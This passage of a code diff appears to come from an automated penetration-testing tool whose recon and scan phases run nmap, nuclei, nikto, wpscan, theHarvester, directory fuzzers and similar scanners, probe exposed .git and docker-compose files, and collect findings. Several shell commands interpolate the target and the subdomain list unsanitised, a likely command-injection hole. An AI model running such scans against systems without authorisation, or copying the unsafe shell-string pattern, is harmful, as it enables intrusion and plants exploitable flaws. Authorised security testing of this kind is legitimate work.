|
|
488
|
+
description=f"Discovered {len(self.subdomains)} unique subdomains",
|
|
489
|
+
severity="info",
|
|
490
|
+
phase="recon",
|
|
491
|
+
tool="subdomain_enum",
|
|
492
|
+
target=self.domain
|
|
493
|
+
))
|
|
494
|
+
|
|
495
|
+
# 2. Live Host Detection with HTTPX
|
|
496
|
+
if "httpx" in self.config.recon_tools and self.subdomains:
|
|
497
|
+
self._log_tool("httpx", "running")
|
|
498
|
+
subs_input = "\n".join(self.subdomains)
|
|
499
|
+
|
|
500
|
+
ret, output = await self._run_command(
|
|
501
|
+
f"echo '{subs_input}' | httpx -silent -status-code -title -tech-detect -json 2>/dev/null",
|
|
502
|
+
timeout=180
|
|
503
|
+
)
|
|
504
|
+
if ret == 0:
|
|
505
|
+
httpx_file = self.output_dir / "httpx_results.json"
|
|
506
|
+
httpx_file.write_text(output)
|
|
507
|
+
|
|
508
|
+
# Parse live hosts
|
|
509
|
+
for line in output.split("\n"):
|
|
510
|
+
if line.strip():
|
|
511
|
+
try:
|
|
512
|
+
data = json.loads(line)
|
|
513
|
+
url = data.get("url", "")
|
|
514
|
+
if url:
|
|
515
|
+
self.live_hosts.append(url)
|
|
516
|
+
except json.JSONDecodeError:
|
|
517
|
+
continue
|
|
518
|
+
|
|
519
|
+
tools_run.append("httpx")
|
|
520
|
+
self._log_tool(f"httpx - {len(self.live_hosts)} live hosts", "done")
|
|
521
|
+
|
|
522
|
+
findings.append(Finding(
|
|
523
|
+
type="live_hosts",
|
|
524
|
+
value=str(len(self.live_hosts)),
|
|
525
|
+
description=f"Found {len(self.live_hosts)} live hosts",
|
|
526
|
+
severity="info",
|
|
527
|
+
phase="recon",
|
|
528
|
+
tool="httpx",
|
|
529
|
+
target=self.domain
|
|
530
|
+
))
|
|
531
|
+
|
|
532
|
+
# 3. Port Scanning with Nmap
|
|
533
|
+
if "nmap" in self.config.recon_tools:
|
|
534
|
+
self._log_tool("nmap", "running")
|
|
535
|
+
# Security: Use safe_domain to prevent command injection
|
|
536
|
+
ret, output = await self._run_command(
|
|
537
|
+
f"nmap -sV --top-ports 100 {self.safe_domain} 2>/dev/null",
|
|
538
|
+
timeout=300
|
|
539
|
+
)
|
|
540
|
+
if ret == 0:
|
|
541
|
+
(self.output_dir / f"nmap_{self.domain}.txt").write_text(output)
|
|
542
|
+
tools_run.append("nmap")
|
|
543
|
+
|
|
544
|
+
# Parse open ports
|
|
545
|
+
for line in output.split("\n"):
|
|
546
|
+
if "/tcp" in line and "open" in line:
|
|
547
|
+
parts = line.split()
|
|
548
|
+
if len(parts) >= 3:
|
|
549
|
+
port = parts[0]
|
|
550
|
+
service = parts[2] if len(parts) > 2 else "unknown"
|
|
551
|
+
findings.append(Finding(
|
|
552
|
+
type="open_port",
|
|
553
|
+
value=port,
|
|
554
|
+
description=f"Port {port} open running {service}",
|
|
555
|
+
severity="info",
|
|
556
|
+
phase="recon",
|
|
557
|
+
tool="nmap",
|
|
558
|
+
target=self.domain
|
|
559
|
+
))
|
|
560
|
+
|
|
561
|
+
self._log_tool("nmap - completed", "done")
|
|
562
|
+
|
|
563
|
+
# 4. Wayback URLs
|
|
564
|
+
if "waybackurls" in self.config.recon_tools:
|
|
565
|
+
self._log_tool("waybackurls", "running")
|
|
566
|
+
# Security: Use safe_domain to prevent command injection
|
|
567
|
+
ret, output = await self._run_command(
|
|
568
|
+
f"echo {self.safe_domain} | waybackurls 2>/dev/null | head -5000"
|
|
569
|
+
)
|
|
570
|
+
if ret == 0:
|
|
571
|
+
(self.output_dir / f"wayback_{self.domain}.txt").write_text(output)
|
|
572
|
+
url_count = len([u for u in output.split("\n") if u.strip()])
|
|
573
|
+
tools_run.append("waybackurls")
|
|
574
|
+
self._log_tool(f"waybackurls - {url_count} URLs", "done")
|
|
575
|
+
|
|
576
|
+
# 5. Amass - Advanced Subdomain Enumeration (NEW)
|
|
577
|
+
if "amass" in self.config.recon_tools:
|
|
578
|
+
self._log_tool("amass", "running")
|
|
579
|
+
ret, output = await self._run_command(
|
|
580
|
+
f"amass enum -passive -d {self.safe_domain} -timeout 5 2>/dev/null",
|
|
581
|
+
timeout=360
|
|
582
|
+
)
|
|
583
|
+
if ret == 0:
|
|
584
|
+
subs = [s.strip() for s in output.split("\n") if s.strip()]
|
|
585
|
+
self.subdomains.extend(subs)
|
|
586
|
+
(self.output_dir / f"amass_{self.domain}.txt").write_text(output)
|
|
587
|
+
tools_run.append("amass")
|
|
588
|
+
self._log_tool(f"amass - {len(subs)} subdomains", "done")
|
|
589
|
+
|
|
590
|
+
# 6. theHarvester - OSINT Email & Subdomain Gathering (NEW)
|
|
591
|
+
if "theHarvester" in self.config.recon_tools:
|
|
592
|
+
self._log_tool("theHarvester", "running")
|
|
593
|
+
ret, output = await self._run_command(
|
|
594
|
+
f"theHarvester -d {self.safe_domain} -b all -l 100 2>/dev/null",
|
|
595
|
+
timeout=300
|
|
596
|
+
)
|
|
597
|
+
if ret == 0:
|
|
598
|
+
(self.output_dir / f"theharvester_{self.domain}.txt").write_text(output)
|
|
599
|
+
# Extract emails and hosts
|
|
600
|
+
emails = []
|
|
601
|
+
for line in output.split("\n"):
|
|
602
|
+
if "@" in line and self.domain in line:
|
|
603
|
+
emails.append(line.strip())
|
|
604
|
+
if emails:
|
|
605
|
+
findings.append(Finding(
|
|
606
|
+
type="email_discovered",
|
|
607
|
+
value=str(len(emails)),
|
|
608
|
+
description=f"Discovered {len(emails)} email addresses",
|
|
609
|
+
severity="info",
|
|
610
|
+
phase="recon",
|
|
611
|
+
tool="theHarvester",
|
|
612
|
+
target=self.domain,
|
|
613
|
+
metadata={"emails": emails[:20]} # Store first 20
|
|
614
|
+
))
|
|
615
|
+
tools_run.append("theHarvester")
|
|
616
|
+
self._log_tool(f"theHarvester - {len(emails)} emails", "done")
|
|
617
|
+
|
|
618
|
+
# 7. dnsrecon - DNS Enumeration & Zone Transfer (NEW)
|
|
619
|
+
if "dnsrecon" in self.config.recon_tools:
|
|
620
|
+
self._log_tool("dnsrecon", "running")
|
|
621
|
+
ret, output = await self._run_command(
|
|
622
|
+
f"dnsrecon -d {self.safe_domain} -t std,brt -j {self.output_dir}/dnsrecon_{self.domain}.json 2>/dev/null",
|
|
623
|
+
timeout=180
|
|
624
|
+
)
|
|
625
|
+
if ret == 0:
|
|
626
|
+
tools_run.append("dnsrecon")
|
|
627
|
+
# Check for zone transfer vulnerability
|
|
628
|
+
if "Zone Transfer" in output and "Success" in output:
|
|
629
|
+
findings.append(Finding(
|
|
630
|
+
type="dns_zone_transfer",
|
|
631
|
+
value="Zone transfer allowed",
|
|
632
|
+
description="DNS zone transfer is allowed - critical information disclosure",
|
|
633
|
+
severity="high",
|
|
634
|
+
phase="recon",
|
|
635
|
+
tool="dnsrecon",
|
|
636
|
+
target=self.domain
|
|
637
|
+
))
|
|
638
|
+
self._log_tool("dnsrecon - completed", "done")
|
|
639
|
+
|
|
640
|
+
# 8. wafw00f - WAF Fingerprinting (NEW)
|
|
641
|
+
if "wafw00f" in self.config.recon_tools:
|
|
642
|
+
self._log_tool("wafw00f", "running")
|
|
643
|
+
ret, output = await self._run_command(
|
|
644
|
+
f"wafw00f {self.target} 2>/dev/null"
|
|
645
|
+
)
|
|
646
|
+
if ret == 0:
|
|
647
|
+
(self.output_dir / f"wafw00f_{self.domain}.txt").write_text(output)
|
|
648
|
+
# Parse WAF detection
|
|
649
|
+
waf_name = "Unknown"
|
|
650
|
+
if "is behind" in output:
|
|
651
|
+
# Extract WAF name
|
|
652
|
+
for line in output.split("\n"):
|
|
653
|
+
if "is behind" in line:
|
|
654
|
+
parts = line.split("is behind")
|
|
655
|
+
if len(parts) > 1:
|
|
656
|
+
waf_name = parts[1].strip().split()[0]
|
|
657
|
+
break
|
|
658
|
+
findings.append(Finding(
|
|
659
|
+
type="waf_detected",
|
|
660
|
+
value=waf_name,
|
|
661
|
+
description=f"Web Application Firewall detected: {waf_name}",
|
|
662
|
+
severity="info",
|
|
663
|
+
phase="recon",
|
|
664
|
+
tool="wafw00f",
|
|
665
|
+
target=self.target
|
|
666
|
+
))
|
|
667
|
+
elif "No WAF" in output:
|
|
668
|
+
findings.append(Finding(
|
|
669
|
+
type="no_waf",
|
|
670
|
+
value="No WAF detected",
|
|
671
|
+
description="No Web Application Firewall detected - target may be more vulnerable",
|
|
672
|
+
severity="low",
|
|
673
|
+
phase="recon",
|
|
674
|
+
tool="wafw00f",
|
|
675
|
+
target=self.target
|
|
676
|
+
))
|
|
677
|
+
tools_run.append("wafw00f")
|
|
678
|
+
self._log_tool(f"wafw00f - {waf_name if 'is behind' in output else 'No WAF'}", "done")
|
|
679
|
+
|
|
680
|
+
# 9. whatweb - Technology Fingerprinting (NEW)
|
|
681
|
+
if "whatweb" in self.config.recon_tools:
|
|
682
|
+
self._log_tool("whatweb", "running")
|
|
683
|
+
ret, output = await self._run_command(
|
|
684
|
+
f"whatweb -a 3 {self.target} --log-json={self.output_dir}/whatweb_{self.domain}.json 2>/dev/null"
|
|
685
|
+
)
|
|
686
|
+
if ret == 0:
|
|
687
|
+
(self.output_dir / f"whatweb_{self.domain}.txt").write_text(output)
|
|
688
|
+
tools_run.append("whatweb")
|
|
689
|
+
self._log_tool("whatweb - completed", "done")
|
|
690
|
+
|
|
691
|
+
# Deduplicate subdomains again after new tools
|
|
692
|
+
self.subdomains = list(set(self.subdomains))
|
|
693
|
+
all_subs_file.write_text("\n".join(self.subdomains))
|
|
694
|
+
|
|
695
|
+
# Add findings to global list
|
|
696
|
+
for f in findings:
|
|
697
|
+
self._add_finding(f)
|
|
698
|
+
|
|
699
|
+
duration = time.time() - start_time
|
|
700
|
+
result = PhaseResult(
|
|
701
|
+
phase=phase,
|
|
702
|
+
status="completed",
|
|
703
|
+
started_at=started_at,
|
|
704
|
+
finished_at=datetime.now(timezone.utc).isoformat(),
|
|
705
|
+
duration=duration,
|
|
706
|
+
findings=findings,
|
|
707
|
+
tools_run=tools_run,
|
|
708
|
+
errors=errors,
|
|
709
|
+
metadata={
|
|
710
|
+
"subdomains_count": len(self.subdomains),
|
|
711
|
+
"live_hosts_count": len(self.live_hosts)
|
|
712
|
+
}
|
|
713
|
+
)
|
|
714
|
+
|
|
715
|
+
self.phase_results[phase] = result
|
|
716
|
+
if self.on_phase_complete:
|
|
717
|
+
self.on_phase_complete(result)
|
|
718
|
+
|
|
719
|
+
return result
|
|
720
|
+
|
|
721
|
+
# ==================== SCAN PHASE ====================
|
|
722
|
+
|
|
723
|
+
async def run_scan(self) -> PhaseResult:
|
|
724
|
+
"""Execute vulnerability scanning phase."""
|
|
725
|
+
phase = Phase.SCAN
|
|
726
|
+
started_at = datetime.now(timezone.utc).isoformat()
|
|
727
|
+
start_time = time.time()
|
|
728
|
+
findings = []
|
|
729
|
+
tools_run = []
|
|
730
|
+
errors = []
|
|
731
|
+
|
|
732
|
+
if self.on_phase_start:
|
|
733
|
+
self.on_phase_start(phase)
|
|
734
|
+
|
|
735
|
+
self._log_phase(phase, f"Vulnerability Scanning on {self.domain}")
|
|
736
|
+
|
|
737
|
+
# 1. Nuclei Scanning
|
|
738
|
+
if "nuclei" in self.config.scan_tools:
|
|
739
|
+
self._log_tool("nuclei", "running")
|
|
740
|
+
ret, output = await self._run_command(
|
|
741
|
+
f"nuclei -u {self.target} -severity low,medium,high,critical -silent 2>/dev/null",
|
|
742
|
+
timeout=600
|
|
743
|
+
)
|
|
744
|
+
if ret == 0:
|
|
745
|
+
(self.output_dir / f"nuclei_{self.domain}.txt").write_text(output)
|
|
746
|
+
tools_run.append("nuclei")
|
|
747
|
+
|
|
748
|
+
# Parse nuclei findings
|
|
749
|
+
for line in output.split("\n"):
|
|
750
|
+
if line.strip():
|
|
751
|
+
# Format: [template-id] [severity] [matched-at]
|
|
752
|
+
parts = line.split()
|
|
753
|
+
if len(parts) >= 2:
|
|
754
|
+
findings.append(Finding(
|
|
755
|
+
type="vulnerability",
|
|
756
|
+
value=parts[0] if parts else line,
|
|
757
|
+
description=line,
|
|
758
|
+
severity=self._parse_nuclei_severity(line),
|
|
759
|
+
phase="scan",
|
|
760
|
+
tool="nuclei",
|
|
761
|
+
target=self.domain
|
|
762
|
+
))
|
|
763
|
+
|
|
764
|
+
self._log_tool(f"nuclei - {len([f for f in findings if f.tool == 'nuclei'])} findings", "done")
|
|
765
|
+
|
|
766
|
+
# 2. SSL/TLS Scanning
|
|
767
|
+
if "sslscan" in self.config.scan_tools:
|
|
768
|
+
self._log_tool("sslscan", "running")
|
|
769
|
+
# Security: Use safe_domain to prevent command injection
|
|
770
|
+
ret, output = await self._run_command(
|
|
771
|
+
f"sslscan {self.safe_domain} 2>/dev/null"
|
|
772
|
+
)
|
|
773
|
+
if ret == 0:
|
|
774
|
+
(self.output_dir / "sslscan_results.txt").write_text(output)
|
|
775
|
+
tools_run.append("sslscan")
|
|
776
|
+
|
|
777
|
+
# Check for weak ciphers
|
|
778
|
+
if "Accepted" in output and ("RC4" in output or "DES" in output or "NULL" in output):
|
|
779
|
+
findings.append(Finding(
|
|
780
|
+
type="weak_cipher",
|
|
781
|
+
value="Weak TLS ciphers detected",
|
|
782
|
+
description="Server accepts weak cryptographic ciphers",
|
|
783
|
+
severity="medium",
|
|
784
|
+
phase="scan",
|
|
785
|
+
tool="sslscan",
|
|
786
|
+
target=self.domain
|
|
787
|
+
))
|
|
788
|
+
|
|
789
|
+
self._log_tool("sslscan - completed", "done")
|
|
790
|
+
|
|
791
|
+
# 3. Directory Fuzzing
|
|
792
|
+
if "ffuf" in self.config.scan_tools:
|
|
793
|
+
self._log_tool("ffuf", "running")
|
|
794
|
+
ret, output = await self._run_command(
|
|
795
|
+
f"ffuf -u {self.target}/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,301,302,403 -s 2>/dev/null | head -50",
|
|
796
|
+
timeout=300
|
|
797
|
+
)
|
|
798
|
+
if ret == 0:
|
|
799
|
+
(self.output_dir / f"ffuf_{self.domain}.txt").write_text(output)
|
|
800
|
+
tools_run.append("ffuf")
|
|
801
|
+
self._log_tool("ffuf - completed", "done")
|
|
802
|
+
|
|
803
|
+
# 4. Nikto - Web Server Vulnerability Scanner (NEW)
|
|
804
|
+
if "nikto" in self.config.scan_tools:
|
|
805
|
+
self._log_tool("nikto", "running")
|
|
806
|
+
ret, output = await self._run_command(
|
|
807
|
+
f"nikto -h {self.target} -Format txt -output {self.output_dir}/nikto_{self.domain}.txt -Tuning 123bde 2>/dev/null",
|
|
808
|
+
timeout=600
|
|
809
|
+
)
|
|
810
|
+
if ret == 0:
|
|
811
|
+
tools_run.append("nikto")
|
|
812
|
+
# Parse nikto findings
|
|
813
|
+
for line in output.split("\n"):
|
|
814
|
+
if "+ " in line and ("OSVDB" in line or "vulnerability" in line.lower() or "outdated" in line.lower()):
|
|
815
|
+
severity = "medium"
|
|
816
|
+
if "critical" in line.lower() or "remote" in line.lower():
|
|
817
|
+
severity = "high"
|
|
818
|
+
findings.append(Finding(
|
|
819
|
+
type="web_vulnerability",
|
|
820
|
+
value=line.strip(),
|
|
821
|
+
description=line.strip(),
|
|
822
|
+
severity=severity,
|
|
823
|
+
phase="scan",
|
|
824
|
+
tool="nikto",
|
|
825
|
+
target=self.target
|
|
826
|
+
))
|
|
827
|
+
nikto_findings = len([f for f in findings if f.tool == "nikto"])
|
|
828
|
+
self._log_tool(f"nikto - {nikto_findings} findings", "done")
|
|
829
|
+
|
|
830
|
+
# 5. WPScan - WordPress Vulnerability Scanner (NEW)
|
|
831
|
+
if "wpscan" in self.config.scan_tools:
|
|
832
|
+
self._log_tool("wpscan", "running")
|
|
833
|
+
# Check if WordPress
|
|
834
|
+
ret, check_output = await self._run_command(
|
|
835
|
+
f"curl -sL {self.target}/wp-login.php --connect-timeout 5 | head -1"
|
|
836
|
+
)
|
|
837
|
+
if "wp-" in check_output.lower() or "wordpress" in check_output.lower():
|
|
838
|
+
wpscan_token = os.getenv("WPSCAN_API_TOKEN", "")
|
|
839
|
+
token_flag = f"--api-token {wpscan_token}" if wpscan_token else ""
|
|
840
|
+
ret, output = await self._run_command(
|
|
841
|
+
f"wpscan --url {self.target} {token_flag} --enumerate vp,vt,u --format json --output {self.output_dir}/wpscan_{self.domain}.json 2>/dev/null",
|
|
842
|
+
timeout=600
|
|
843
|
+
)
|
|
844
|
+
if ret == 0:
|
|
845
|
+
tools_run.append("wpscan")
|
|
846
|
+
# Parse JSON output
|
|
847
|
+
try:
|
|
848
|
+
wpscan_file = self.output_dir / f"wpscan_{self.domain}.json"
|
|
849
|
+
if wpscan_file.exists():
|
|
850
|
+
wpscan_data = json.loads(wpscan_file.read_text())
|
|
851
|
+
vulns = wpscan_data.get("vulnerabilities", [])
|
|
852
|
+
for vuln in vulns:
|
|
853
|
+
findings.append(Finding(
|
|
854
|
+
type="wordpress_vulnerability",
|
|
855
|
+
value=vuln.get("title", "Unknown"),
|
|
856
|
+
description=vuln.get("description", vuln.get("title", "")),
|
|
857
|
+
severity=self._map_wpscan_severity(vuln.get("severity", "medium")),
|
|
858
|
+
phase="scan",
|
|
859
|
+
tool="wpscan",
|
|
860
|
+
target=self.target,
|
|
861
|
+
metadata={"cve": vuln.get("cve", [])}
|
|
862
|
+
))
|
|
863
|
+
except (json.JSONDecodeError, FileNotFoundError):
|
|
864
|
+
pass
|
|
865
|
+
self._log_tool(f"wpscan - WordPress detected", "done")
|
|
866
|
+
else:
|
|
867
|
+
self._log_tool("wpscan - Not WordPress, skipped", "done")
|
|
868
|
+
|
|
869
|
+
# 6. testssl.sh - Comprehensive SSL/TLS Testing (NEW)
|
|
870
|
+
if "testssl" in self.config.scan_tools:
|
|
871
|
+
self._log_tool("testssl", "running")
|
|
872
|
+
ret, output = await self._run_command(
|
|
873
|
+
f"testssl --jsonfile {self.output_dir}/testssl_{self.domain}.json --severity LOW {self.safe_domain} 2>/dev/null",
|
|
874
|
+
timeout=300
|
|
875
|
+
)
|
|
876
|
+
if ret == 0:
|
|
877
|
+
(self.output_dir / f"testssl_{self.domain}.txt").write_text(output)
|
|
878
|
+
tools_run.append("testssl")
|
|
879
|
+
# Parse for critical SSL issues
|
|
880
|
+
ssl_issues = []
|
|
881
|
+
for line in output.split("\n"):
|
|
882
|
+
if "VULNERABLE" in line or "NOT ok" in line:
|
|
883
|
+
ssl_issues.append(line.strip())
|
|
884
|
+
severity = "high" if "VULNERABLE" in line else "medium"
|
|
885
|
+
findings.append(Finding(
|
|
886
|
+
type="ssl_vulnerability",
|
|
887
|
+
value=line.strip()[:100],
|
|
888
|
+
description=line.strip(),
|
|
889
|
+
severity=severity,
|
|
890
|
+
phase="scan",
|
|
891
|
+
tool="testssl",
|
|
892
|
+
target=self.domain
|
|
893
|
+
))
|
|
894
|
+
self._log_tool(f"testssl - {len(ssl_issues)} issues", "done")
|
|
895
|
+
|
|
896
|
+
# 7. Gobuster - Directory/Vhost Enumeration (NEW)
|
|
897
|
+
if "gobuster" in self.config.scan_tools:
|
|
898
|
+
self._log_tool("gobuster", "running")
|
|
899
|
+
ret, output = await self._run_command(
|
|
900
|
+
f"gobuster dir -u {self.target} -w /usr/share/wordlists/dirb/common.txt -q -t 20 --no-error 2>/dev/null | head -100",
|
|
901
|
+
timeout=300
|
|
902
|
+
)
|
|
903
|
+
if ret == 0:
|
|
904
|
+
(self.output_dir / f"gobuster_{self.domain}.txt").write_text(output)
|
|
905
|
+
tools_run.append("gobuster")
|
|
906
|
+
# Parse discovered paths
|
|
907
|
+
for line in output.split("\n"):
|
|
908
|
+
if line.strip() and ("Status:" in line or "(Status:" in line):
|
|
909
|
+
# Check for interesting paths
|
|
910
|
+
if any(p in line.lower() for p in ["admin", "backup", "config", "api", "debug", ".git"]):
|
|
911
|
+
findings.append(Finding(
|
|
912
|
+
type="interesting_path",
|
|
913
|
+
value=line.strip(),
|
|
914
|
+
description=f"Potentially sensitive path discovered: {line.strip()}",
|
|
915
|
+
severity="low",
|
|
916
|
+
phase="scan",
|
|
917
|
+
tool="gobuster",
|
|
918
|
+
target=self.target
|
|
919
|
+
))
|
|
920
|
+
self._log_tool("gobuster - completed", "done")
|
|
921
|
+
|
|
922
|
+
# 8. Dirsearch - Advanced Directory Discovery (NEW)
|
|
923
|
+
if "dirsearch" in self.config.scan_tools:
|
|
924
|
+
self._log_tool("dirsearch", "running")
|
|
925
|
+
ret, output = await self._run_command(
|
|
926
|
+
f"dirsearch -u {self.target} -e php,asp,aspx,jsp,html,js -t 20 --format plain -o {self.output_dir}/dirsearch_{self.domain}.txt 2>/dev/null",
|
|
927
|
+
timeout=300
|
|
928
|
+
)
|
|
929
|
+
if ret == 0:
|
|
930
|
+
tools_run.append("dirsearch")
|
|
931
|
+
self._log_tool("dirsearch - completed", "done")
|
|
932
|
+
|
|
933
|
+
# 9. Acunetix DAST Scan (Enterprise)
|
|
934
|
+
if self.config.use_acunetix:
|
|
935
|
+
self._log_tool("Acunetix DAST", "running")
|
|
936
|
+
try:
|
|
937
|
+
acunetix = get_acunetix()
|
|
938
|
+
if acunetix.connect():
|
|
939
|
+
# Start scan
|
|
940
|
+
profile_map = {
|
|
941
|
+
"full": ScanProfile.FULL_SCAN,
|
|
942
|
+
"high_risk": ScanProfile.HIGH_RISK,
|
|
943
|
+
"xss": ScanProfile.XSS_SCAN,
|
|
944
|
+
"sqli": ScanProfile.SQL_INJECTION,
|
|
945
|
+
}
|
|
946
|
+
profile = profile_map.get(self.config.acunetix_profile, ScanProfile.FULL_SCAN)
|
|
947
|
+
|
|
948
|
+
scan_id = acunetix.scan_url(self.target, profile, f"AIPT Scan - {self.timestamp}")
|
|
949
|
+
self.scan_ids["acunetix"] = scan_id
|
|
950
|
+
|
|
951
|
+
# Save scan info
|
|
952
|
+
scan_info = {
|
|
953
|
+
"scan_id": scan_id,
|
|
954
|
+
"target": self.target,
|
|
955
|
+
"profile": self.config.acunetix_profile,
|
|
956
|
+
"started_at": datetime.now(timezone.utc).isoformat(),
|
|
957
|
+
"dashboard_url": f"{acunetix.config.base_url}/#/scans/{scan_id}"
|
|
958
|
+
}
|
|
959
|
+
(self.output_dir / "acunetix_scan.json").write_text(json.dumps(scan_info, indent=2))
|
|
960
|
+
|
|
961
|
+
tools_run.append("acunetix")
|
|
962
|
+
self._log_tool(f"Acunetix - Scan started: {scan_id[:8]}...", "done")
|
|
963
|
+
|
|
964
|
+
# Optionally wait for completion
|
|
965
|
+
if self.config.wait_for_scanners:
|
|
966
|
+
self._log_tool("Acunetix - Waiting for completion...", "running")
|
|
967
|
+
result = acunetix.wait_for_scan(
|
|
968
|
+
scan_id,
|
|
969
|
+
timeout=self.config.scanner_timeout,
|
|
970
|
+
poll_interval=30
|
|
971
|
+
)
|
|
972
|
+
|
|
973
|
+
# Get vulnerabilities
|
|
974
|
+
vulns = acunetix.get_scan_vulnerabilities(scan_id)
|
|
975
|
+
for vuln in vulns:
|
|
976
|
+
findings.append(Finding(
|
|
977
|
+
type="vulnerability",
|
|
978
|
+
value=vuln.name,
|
|
979
|
+
description=vuln.description or vuln.name,
|
|
980
|
+
severity=vuln.severity,
|
|
981
|
+
phase="scan",
|
|
982
|
+
tool="acunetix",
|
|
983
|
+
target=vuln.affected_url,
|
|
984
|
+
metadata={
|
|
985
|
+
"vuln_id": vuln.vuln_id,
|
|
986
|
+
"cvss": vuln.cvss_score,
|
|
987
|
+
"cwe": vuln.cwe_id
|
|
988
|
+
}
|
|
989
|
+
))
|
|
990
|
+
|
|
991
|
+
self._log_tool(f"Acunetix - {len(vulns)} vulnerabilities found", "done")
|
|
992
|
+
else:
|
|
993
|
+
errors.append("Acunetix connection failed")
|
|
994
|
+
self._log_tool("Acunetix - Connection failed", "error")
|
|
995
|
+
except Exception as e:
|
|
996
|
+
errors.append(f"Acunetix error: {str(e)}")
|
|
997
|
+
self._log_tool(f"Acunetix - Error: {str(e)}", "error")
|
|
998
|
+
|
|
999
|
+
# 5. Burp Suite Scan (Enterprise)
|
|
1000
|
+
if self.config.use_burp:
|
|
1001
|
+
self._log_tool("Burp Suite", "running")
|
|
1002
|
+
try:
|
|
1003
|
+
burp = get_burp()
|
|
1004
|
+
if burp.connect():
|
|
1005
|
+
scan_id = burp.scan_url(self.target)
|
|
1006
|
+
self.scan_ids["burp"] = scan_id
|
|
1007
|
+
tools_run.append("burp")
|
|
1008
|
+
self._log_tool(f"Burp Suite - Scan started: {scan_id}", "done")
|
|
1009
|
+
else:
|
|
1010
|
+
errors.append("Burp Suite connection failed")
|
|
1011
|
+
except Exception as e:
|
|
1012
|
+
errors.append(f"Burp Suite error: {str(e)}")
|
|
1013
|
+
|
|
1014
|
+
# ==================== CONTAINER SECURITY (DevSecOps) ====================
|
|
1015
|
+
# 10. Trivy - Container/Image Vulnerability Scanner
|
|
1016
|
+
if self.config.enable_container_scan or self.config.full_mode:
|
|
1017
|
+
self._log_tool("trivy", "running")
|
|
1018
|
+
try:
|
|
1019
|
+
# Scan any discovered container images or Docker configuration
|
|
1020
|
+
docker_compose = self.output_dir / "docker-compose.yml"
|
|
1021
|
+
dockerfile = self.output_dir / "Dockerfile"
|
|
1022
|
+
|
|
1023
|
+
# First, try to detect Docker presence via common paths
|
|
1024
|
+
ret, output = await self._run_command(
|
|
1025
|
+
f"curl -sI {self.target}/docker-compose.yml --connect-timeout 5 | head -1",
|
|
1026
|
+
timeout=10
|
|
1027
|
+
)
|
|
1028
|
+
has_docker = "200" in output
|
|
1029
|
+
|
|
1030
|
+
# Scan web target for container-related vulnerabilities
|
|
1031
|
+
ret, trivy_output = await self._run_command(
|
|
1032
|
+
f"trivy fs --severity {self.config.trivy_severity} --format json --output {self.output_dir}/trivy_{self.domain}.json . 2>/dev/null",
|
|
1033
|
+
timeout=300
|
|
1034
|
+
)
|
|
1035
|
+
if ret == 0:
|
|
1036
|
+
tools_run.append("trivy")
|
|
1037
|
+
# Parse trivy JSON output
|
|
1038
|
+
trivy_file = self.output_dir / f"trivy_{self.domain}.json"
|
|
1039
|
+
if trivy_file.exists():
|
|
1040
|
+
try:
|
|
1041
|
+
trivy_data = json.loads(trivy_file.read_text())
|
|
1042
|
+
for result in trivy_data.get("Results", []):
|
|
1043
|
+
for vuln in result.get("Vulnerabilities", []):
|
|
1044
|
+
severity = vuln.get("Severity", "UNKNOWN").lower()
|
|
1045
|
+
findings.append(Finding(
|
|
1046
|
+
type="container_vulnerability",
|
|
1047
|
+
value=vuln.get("VulnerabilityID", "Unknown"),
|
|
1048
|
+
description=f"{vuln.get('PkgName', '')}: {vuln.get('Title', vuln.get('VulnerabilityID', ''))}",
|
|
1049
|
+
severity=severity if severity in ["critical", "high", "medium", "low"] else "medium",
|
|
1050
|
+
phase="scan",
|
|
1051
|
+
tool="trivy",
|
|
1052
|
+
target=self.target,
|
|
1053
|
+
metadata={
|
|
1054
|
+
"cve": vuln.get("VulnerabilityID"),
|
|
1055
|
+
"package": vuln.get("PkgName"),
|
|
1056
|
+
"installed_version": vuln.get("InstalledVersion"),
|
|
1057
|
+
"fixed_version": vuln.get("FixedVersion"),
|
|
1058
|
+
"cvss": vuln.get("CVSS", {})
|
|
1059
|
+
}
|
|
1060
|
+
))
|
|
1061
|
+
except (json.JSONDecodeError, FileNotFoundError):
|
|
1062
|
+
pass
|
|
1063
|
+
trivy_findings = len([f for f in findings if f.tool == "trivy"])
|
|
1064
|
+
self._log_tool(f"trivy - {trivy_findings} vulnerabilities", "done")
|
|
1065
|
+
else:
|
|
1066
|
+
self._log_tool("trivy - not installed or failed", "skip")
|
|
1067
|
+
except Exception as e:
|
|
1068
|
+
errors.append(f"Trivy error: {str(e)}")
|
|
1069
|
+
self._log_tool(f"trivy - error: {str(e)}", "error")
|
|
1070
|
+
|
|
1071
|
+
# ==================== SECRET DETECTION (DevSecOps) ====================
|
|
1072
|
+
# 11. Gitleaks - Secret Detection in Git Repos
|
|
1073
|
+
if self.config.enable_secret_detection or self.config.full_mode:
|
|
1074
|
+
self._log_tool("gitleaks", "running")
|
|
1075
|
+
try:
|
|
1076
|
+
# Check if .git is exposed
|
|
1077
|
+
ret, git_check = await self._run_command(
|
|
1078
|
+
f"curl -sI {self.target}/.git/config --connect-timeout 5 | head -1",
|
|
1079
|
+
timeout=10
|
|
1080
|
+
)
|
|
1081
|
+
if "200" in git_check:
|
|
1082
|
+
findings.append(Finding(
|
|
1083
|
+
type="exposed_git",
|
|
1084
|
+
value=f"{self.target}/.git/config",
|
|
1085
|
+
description="Git repository exposed - potential source code and credentials leak",
|
|
1086
|
+
severity="critical",
|
|
1087
|
+
phase="scan",
|
|
1088
|
+
tool="gitleaks",
|
|
1089
|
+
target=self.target
|
|
1090
|
+
))
|
|
1091
|
+
|
|
1092
|
+
# Run gitleaks on local output directory for any downloaded content
|
|
1093
|
+
ret, gitleaks_output = await self._run_command(
|
|
1094
|
+
f"gitleaks detect --source {self.output_dir} --report-path {self.output_dir}/gitleaks_{self.domain}.json --report-format json 2>/dev/null",
|
|
1095
|
+
timeout=120
|
|
1096
|
+
)
|
|
1097
|
+
if ret == 0 or ret == 1: # gitleaks returns 1 when secrets found
|
|
1098
|
+
tools_run.append("gitleaks")
|
|
1099
|
+
gitleaks_file = self.output_dir / f"gitleaks_{self.domain}.json"
|
|
1100
|
+
if gitleaks_file.exists():
|
|
1101
|
+
try:
|
|
1102
|
+
gitleaks_data = json.loads(gitleaks_file.read_text())
|
|
1103
|
+
for secret in gitleaks_data if isinstance(gitleaks_data, list) else []:
|
|
1104
|
+
findings.append(Finding(
|
|
1105
|
+
type="secret_detected",
|
|
1106
|
+
value=secret.get("RuleID", "Unknown"),
|
|
1107
|
+
description=f"Secret detected: {secret.get('Description', secret.get('RuleID', 'Unknown secret'))}",
|
|
1108
